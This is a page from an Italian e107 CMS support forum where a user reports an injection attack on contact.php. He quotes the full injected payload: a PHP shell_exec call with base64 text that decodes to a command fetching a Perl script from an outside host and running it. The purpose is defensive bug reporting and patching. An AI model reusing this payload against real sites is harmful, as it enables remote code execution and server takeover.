e107 temi forum

Italiano Italiano
 Area Utenti
Ricordami   
Team italiano di supporto e risorse gratuite per il CMS e107.
Non sei ancora registrato?  Registrati adesso!
Ti serve un tema personalizzato? 

Forum

e107 temi Italia , supporto e risorse gratuite :: Forum :: Area di Supporto ad e107 :: Bug
 

falla su contact.php

<< Discussione precedente | Discussione successiva >>
 Moderatori: Admin, Alf
 Devi essere registrato e loggato per partecipare a questo forum.
login qui oppure Registrati
Sponsored links
         
Autore Messaggio
kreos
06 giu : 22:59    ]   ]
Nessun Avatar
online
Utenti Registrati #122
Registrato il: 05 dic : 05:10
messaggi: 21
ciao Alf la falla che mi sta stressando i servers
(a nostro avviso)
è localizzato sul modulo, come da te accennato su

../contact.php
sotto il codice che viene iniettato
  1. &amp;author_name=%5Bphp%5Dshell_exec(base64_decode("d2dldCBodHRwOi8venVvLnBv ZGdvcnoub3JnL3p1by9zaGIuc GwgLU8gL3RtcC9ibztwZXJsIC 90bXAvYm8="));%3Bdie%28%29%3B%5B%2Fphp%5D


che sostanzialmente fa questo
  1.  
  2. author_name=[-  php   -]shell_exec( .. );;die();[-   /php   -]
  3.  



per problemi di visualizzazione ho inserito tra le parentesi graffe
i trattini -
se risolviamo ti passo la patch.
ciao

[ Modificato 06 giu : 23:02 ]
Torna ad inizio pagina
 

Salta:     Torna ad inizio pagina

RSS discussione: rss 0.92 RSS discussione: rss 2.0 RSS discussione: RDF
Powered by e107 Forum System
informazioni  Modalità ospite: nessuna info disponibile.  Registrati
mailBox  ip: 38.107.191.114